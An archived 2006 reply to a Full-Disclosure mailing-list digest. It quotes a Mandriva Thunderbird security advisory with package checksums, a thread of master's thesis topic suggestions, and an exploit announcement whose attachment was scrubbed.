>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/security/advisories
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  _______________________________________________________________________
>
>  Type Bits/KeyID     Date       User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2 (GNU/Linux)
>
>iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
>75x+jP9FNzlE7ieAV3r7Czs=
>=DdKu
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 4
>Date: Fri, 15 Dec 2006 17:01:50 -0600 (CST)
>From: scott hollatz 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: Fajar Edisya Putera 
>Cc: full-disclosure at lists.grok.org.uk
>Message-ID: 
>Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> > Hello everyone, sorry for wasting your bandwidth
> >
> > I'm currently trying to find an interesting topic in computer networking
> > security for my master degree thesis, I've read a lot of jurnal that 
>related
> > with computer networking and security. All journal seem to advanced for 
>me,
> > sometimes the journal has mathematical formula that I don't understand 
>what
> > is the point for. Maybe someone here willing to help me? an idea? or 
>another
> > journal website?
>
>Networking and security *is* mathematical, don't be fooled.
>
>A quick peek at "ACM Transactions on Information and System Security"
>and "IEEE/ACM Transactions on Networking" should be a hint you need to
>understand math to do a relatively decent masters thesis.
>
>- --
>scott hollatz                                        net shollatz at d.UMn.eDu
>information technology systems and services          tel +1 218 726 8851
>university of minnesota duluth mn usa                fax +1 218 726 7674
>                                                                           
>--
>                                                "Asn aD ta zlAp em uT 
>zt33rg"
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.6 (SunOS)
>
>iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
>ZuitIDA2auiGOhFPl9xUFfw=
>=ILTE
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 5
>Date: Fri, 15 Dec 2006 23:30:19 +0000
>From: xyberpix 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: scott hollatz 
>Cc: full-disclosure at lists.grok.org.uk
>Message-ID: <6ACC9203-E28C-42D8-8783-CB77D24417A9 at xyberpix.com>
>Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>What about hacking ATM's, that'd make a great thesis from my side.
>Also what about in-depth research into botnets?
>
>xyberpix
>
>On 15 Dec 2006, at 23:01, scott hollatz wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >> Hello everyone, sorry for wasting your bandwidth
> >>
> >> I'm currently trying to find an interesting topic in computer
> >> networking
> >> security for my master degree thesis, I've read a lot of jurnal
> >> that related
> >> with computer networking and security. All journal seem to
> >> advanced for me,
> >> sometimes the journal has mathematical formula that I don't
> >> understand what
> >> is the point for. Maybe someone here willing to help me? an idea?
> >> or another
> >> journal website?
> >
> > Networking and security *is* mathematical, don't be fooled.
> >
> > A quick peek at "ACM Transactions on Information and System Security"
> > and "IEEE/ACM Transactions on Networking" should be a hint you need to
> > understand math to do a relatively decent masters thesis.
> >
> > - --
> > scott hollatz                                        net
> > shollatz at d.UMn.eDu
> > information technology systems and services          tel +1 218 726
> > 8851
> > university of minnesota duluth mn usa                fax +1 218 726
> > 7674
> >
> >     --
> >                                                "Asn aD ta zlAp em
> > uT zt33rg"
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.6 (SunOS)
> >
> > iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
> > ZuitIDA2auiGOhFPl9xUFfw=
> > =ILTE
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.5 (Darwin)
>
>iD8DBQFFgzAMt+Si58vRtJARAqpBAKCfgFJVAmrKNKqf0v0prg2YbupjfACgo1g1
>hylhuBgjFPhJ0QYXoS1XMXs=
>=DWHp
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 6
>Date: Fri, 15 Dec 2006 16:16:50 -0800
>From: "Bill Stout" 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: 
>Message-ID:
>	<1FA45C2E5F2E4B46967415DA3A804FE88125D9 at mail.greenborder.com>
>Content-Type: text/plain; charset="us-ascii"
>
>Here are a few ideas:
>
>
>
>- The threat of rogue Virtual machines - the inside man
>
>- Disassembling Vista Security
>
>- Investigating organized computer crime
>
>- The mythical network perimeter
>
>- Data flow analysis of confidential information within corporations
>
>- Distribution and access of personal data
>
>
>
>Just suggestions, but your thesis should be of a topic which is a
>passion for you and holds your interest.  Your thesis topic may affect
>your next few years of employment, so invest in something that will be
>around for awhile (don't write about a technology approaching end of
>life).
>
>
>
>Bill Stout
>
>
>
>________________________________
>
>From: full-disclosure-bounces at lists.grok.org.uk
>[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fajar
>Edisya Putera
>Sent: Friday, December 15, 2006 1:45 AM
>To: full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] [OOT] Thesis for master degree
>
>
>
>Hello everyone, sorry for wasting your bandwidth
>
>I'm currently trying to find an interesting topic in computer networking
>security for my master degree thesis, I've read a lot of jurnal that
>related with computer networking and security. All journal seem to
>advanced for me, sometimes the journal has mathematical formula that I
>don't understand what is the point for. Maybe someone here willing to
>help me? an idea? or another journal website?
>
>Thanks
>Sincerely yours
>Fajar
>
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/fa897403/attachment-0001.html
>
>------------------------------
>
>Message: 7
>Date: Sat, 16 Dec 2006 05:27:13 +0100
>From: "kcope" 
>Subject: [Full-disclosure] ftpd ld.so.preload fun
>To: full-disclosure at lists.grok.org.uk
>Message-ID: <20061216042713.235360 at gmx.net>
>Content-Type: text/plain; charset="iso-8859-1"
>
>Hello this is kingcope,
>attached is an example exploit
>
>
>--
>"Ein Herz f?r Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
>Unser Dankesch?n: Ihr Name auf dem Segel der 1. deutschen America's 
>Cup-Yacht!
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: ftpd-ldpreload.pl
>Type: application/octet-stream
>Size: 2733 bytes
>Desc: not available
>Url : 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061216/91666f7f/attachment-0001.obj
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 22, Issue 27
>***********************************************

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/



From gigiyousef at hotmail.com  Sun Dec 17 05:29:22 2006
From: gigiyousef at hotmail.com (badr muhyeddin)
Date: Sun, 17 Dec 2006 07:29:22 +0200
Subject: [Full-disclosure] Full-Disclosure Digest, Vol 22, Issue 27
In-Reply-To: 
Message-ID: 

please,dont send me any other messages regarding the same subject


>From: full-disclosure-request at lists.grok.org.uk
>Reply-To: full-disclosure at lists.grok.org.uk
>To: full-disclosure at lists.grok.org.uk
>Subject: Full-Disclosure Digest, Vol 22, Issue 27
>Date: Sat, 16 Dec 2006 12:00:02 +0000
>
>Send Full-Disclosure mailing list submissions to
>	full-disclosure at lists.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
>	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
>	full-disclosure-request at lists.grok.org.uk
>
>You can reach the person managing the list at
>	full-disclosure-owner at lists.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please trim your 
>post appropriately. Thank you.
>
>
>Today's Topics:
>
>    1. [ MDKSA-2006:206 ] - Updated Thunderbird packages	fix
>       multiple vulnerabilities (security at mandriva.com)
>    2. [OOT] Thesis for master degree (Fajar Edisya Putera)
>    3. [ MDKSA-2006:206 ] - Updated Thunderbird packages	fix
>       multiple vulnerabilities (security at mandriva.com)
>    4. Re: [OOT] Thesis for master degree (scott hollatz)
>    5. Re: [OOT] Thesis for master degree (xyberpix)
>    6. Re: [OOT] Thesis for master degree (Bill Stout)
>    7. ftpd ld.so.preload fun (kcope)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Fri, 15 Dec 2006 14:36:00 -0700
>From: security at mandriva.com
>Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird
>	packages	fix multiple vulnerabilities
>To: full-disclosure at lists.grok.org.uk
>Message-ID: 
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>  _______________________________________________________________________
>
>  Mandriva Linux Security Advisory                         MDKSA-2006:206
>  http://www.mandriva.com/security/
>  _______________________________________________________________________
>
>  Package : mozilla-thunderbird
>  Date    : November 9, 2006
>  Affected: 2007.0, Corporate 3.0
>  _______________________________________________________________________
>
>  Problem Description:
>
>  A number of security vulnerabilities have been discovered and corrected
>  in the latest Mozilla Thunderbird program, version 1.5.0.8.
>
>  This update provides the latest Thunderbird to correct these issues.
>  _______________________________________________________________________
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
>  http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
>  _______________________________________________________________________
>
>  Updated Packages:
>
>  Mandriva Linux 2007.0:
>  488e65dfe45ecf7e3a9e1a3dedd5c2ce  
>2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
>  5e551ab45061148722dda1d7ce66959e  
>2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2149a7fd629b8bc6843c6fdf1bb49efb  
>2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0d2315b490e3b8dd2ab791bd6c3ee516  
>2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d5583d1b99b948c90e1cad62d753d67d  
>2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
>  00ec607c39d3de4c589997d6c7ee6679  
>2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6d1f0f2576362a0bb90b4f9d8c4f2153  
>2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2cb0e44d2e3f7fddd60249843204403f  
>2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0c3c771882698d5651775aeed24bfd73  
>2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
>  477ca905391c1d555d0136d46d557869  
>2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  741811dd392d942b27e1b3b0de695d4e  
>2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7c2c4922c6a2c6ce2cb6108a95f7dbfa  
>2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7cbf9f3218d587ef97edf01f2298096b  
>2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7dbd9e4c16db82a761a7b502c1f7f22d  
>2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b6dd6119216f6b748ee7c1570c3b8c37  
>2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1eea732e08ca0ef96796c3f50abb1f77  
>2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1cc5cf2496581d776bb43e2f0dbbea6  
>2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  af86ce82ff9053250f82f2215c8dd7e5  
>2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6319633c561c7f68c6614685126da02b  
>2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56387829c6cc83882246e68e3b8704b0  
>2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56cb838bb0c375f53d3cff2eb76a1118  
>2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  253500598ff56ab85394e68708ace21d  
>2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  53b4d4f1aa4e8174a33a0ed436ce961a  
>2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fb9dd6933d27029538cd01a64ec55cee  
>2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  701b9837303a3ed79e6c74c037c28926  
>2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b3739c1344770e92864c50f131f08884  
>2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1efe7ebc2a71e2f2d6c2785026a6e7ac  
>2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6860352b37999652aab785a266673e2f  
>2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  51abe323b14793097935b0c221e64f71  
>2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b8ec884437a460c9fbb5c71db6a46c31  
>2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  9ae4fb1871ee29f3f7b52210c0cf4e1b  
>2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1a31b03ffef8e86df09579296fce3c9  
>2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6b4bdbb4648231b128655e56015621c7  
>2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d333252ee1ba51351762e4050565ecb1  
>2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0a2828dbab70a2be0e721cc016f93d7f  
>2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  defa2ac291c66f693946362bd2501c40  
>2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c5540aa8289eefbf3e708e442de77aa8  
>2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  45da9968c4661ef994ef1dcefd0ad54f  
>2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
>  df8d2ea1013a65457aa1f2100060d968  
>2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  f87f2441b2ca36d4f5c3f3f2dd04b3bb  
>2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  bc3a281fbc5c09b7f962dfb1d3b9e517  
>2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2563050985477697472069d08e96de0f  
>2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e22be985ae58ab3eba5b90aa6a3eb58e  
>2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fde0d1b9c4feee3c1e239345f4065090  
>2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  10be2386887a6c70bc4f9c0453b33072  
>2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1c92d5ee79fc52ec1525f3c96dfa1916  
>2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  42e6ddb4a33a297c71b996bf651a4d69  
>2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  96394d1245284a886b954bb063c0ab5b  
>2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  8386317130e064260bd8b114616410ed  
>2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  eb622e8adc0767e090a608e80a1611b7  
>2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3ca6736aaf725851a0be21f0490aeb20  
>2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  47b16b8c45acc936b62051594ed87c69  
>2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c2e742162882c52761040025ff4ddfff  
>2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  072c5224bd49a45ba7ab0a57f657ec6e  
>2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3393e810730d305adc4fe8ecc98b782a  
>2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  70882501b0fc01a56cee67c2b7c63ac5  
>2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Mandriva Linux 2007.0/X86_64:
>  47aa8c7af46ee44f1b51e0f44772beeb  
>2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e284b46733e04ab96cccb612de04e5a8  
>2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e73efd093c48aa82d6f73025f1ade443  
>2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ed790bdd1a45343b427925765f5f2b5c  
>2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  61690a97ef04b6083693ffe4a9ab3176  
>2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  889574eda89385739aad6eda7f3d2604  
>2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ef9b59cdd619da74737b5e91e4067386  
>2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e20a88ece32f8ee81aaedd828558d880  
>2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  250f6f86984922da278774d480ba37a7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f683dba38c9055cbac36f8468e357ebf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6594d0bb3f7770f168728827c1cf9f83  
>2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1ee011c3c94c7b081f53b9a55996da0c  
>2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be24dd32e628b8294c1b87d200cf02dd  
>2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  020acf8e510080a701c6278c6eb862ae  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  af4c92e4f3eaf833111572ead14c8c04  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7483c3a55198fcbc9be2c9750919a370  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  753acdb58e6400659dab48ff78f371e7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  fb83f542bd12edda5e85d9873a08a938  
>2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  996bbfb13654cfc2180036ea6b1e61df  
>2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ff6217b99ab96a1444b6a758bf184ecf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f15d9f053011068deba71fdc05dc6d46  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  98f63b0dedef781ec16f8bebb6a032cb  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e5e42bb849d26a4f59fb6204d6ed9850  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8bc9d56d4778baf40b115eb805a506b3  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  21c7d7ffd14a724e4ce9d96e99d0f3c7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9b115831c8ae36d7141c93a9d867d445  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  d6efb3cdaba13c17dd31147011796614  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4239765036a0bffaa4fcff9fb076a221  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be87cc456600cb0dc18730ae3f75af92  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  459367e42865a1de4374d2a9b8c36232  
>2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e1b30720806b2c6ab650251f9756127  
>2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  70c5525bea63d291374706abfb4523c4  
>2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4addf81f6fdb0fe55d2274ba726d066e  
>2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9c9a1e6a7623a712f40666e77fd3f2b4  
>2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9cd9d0509bbe4d0bc7c092118253c237  
>2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  b23236fc11caa38b1354893f1e9863e1  
>2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c5b898d7f04c26a34bb4223ee4547586  
>2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8e114fec014131d472790035a1509783  
>2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  3eda3b36a83c550a1f52faf6adfb0b10  
>2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c336cc525567465d1649ee55c604d3a3  
>2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  476f974ea2e3b9ef971231b8b08e62f0  
>2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7878332de8134b9025b924315d6ffbf6  
>2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7602f9099c26d60e934f54918dd38e46  
>2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  52ba4b91175db4376fd4c4e9018969c3  
>2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e2bc31ee83c5c47f06953aba976a27d  
>2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  47b180beb65802e89f7e6a8be7f33d15  
>2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6485a71b5d07fef3e337630aa53bb4c6  
>2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6b5df9cad533fc75fc47191df5f3dabf  
>2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99b61d660a72eff639f78ec0422aeaf2  
>2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99cfe247978fe85b5b5186bf12247f3a  
>2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8c393629997cea717c2f1e8d077a9344  
>2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be518e4b4833e6cb9d083871101be35b  
>2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8dedff0ffd0e7b7721b256f01821f188  
>2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  05202d61506a60981fb9a317ce6a5d5d  
>2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0deda88ec857fb0c11b57555814a20ec  
>2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0f2f7928b2edfbe0ae5faf127b0ed066  
>2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Corporate 3.0:
>  71192ef0a8bd28533718191d287d8158  
>corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
>  c0121a4a0192d7944b1f8d30c977ab38  
>corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
>  53c403f48cb8547f0eb646ab1b41b656  
>corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  032ebcc12942292620b05929e0583f3a  
>corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  c88d6e26aa75dab433abcf71f2962e5c  
>corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
